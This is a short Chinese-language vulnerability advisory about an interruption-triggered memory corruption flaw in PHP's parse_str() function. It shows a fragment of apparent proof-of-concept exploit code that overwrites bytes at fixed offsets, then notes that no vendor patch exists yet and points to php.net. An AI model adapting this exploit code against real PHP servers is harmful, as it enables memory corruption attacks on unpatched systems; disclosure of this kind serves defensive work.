PHP parse_str()函数中断内存破坏漏洞

        if (is_float($i)) {
            for ($j=0; $j<4; $j++) {
                $x[0x20 + $j] = ‘A’;
            }
        } else {
            for ($j=0; $j<8; $j++) {
                $x[0x38 + $j] = ‘A’;
            }
        }
        return $x;
    }
?>

建议:


厂商补丁:

PHP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.php.net

发表评论?

0 条评论。

发表评论